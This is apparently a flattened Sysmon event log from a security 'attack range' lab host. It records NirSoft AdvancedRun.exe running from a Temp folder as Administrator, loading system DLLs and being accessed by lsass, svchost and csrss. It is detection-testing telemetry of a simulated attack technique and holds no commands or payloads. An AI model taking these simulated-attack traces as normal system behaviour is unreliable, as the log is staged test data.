18:44:38.738{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004011372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 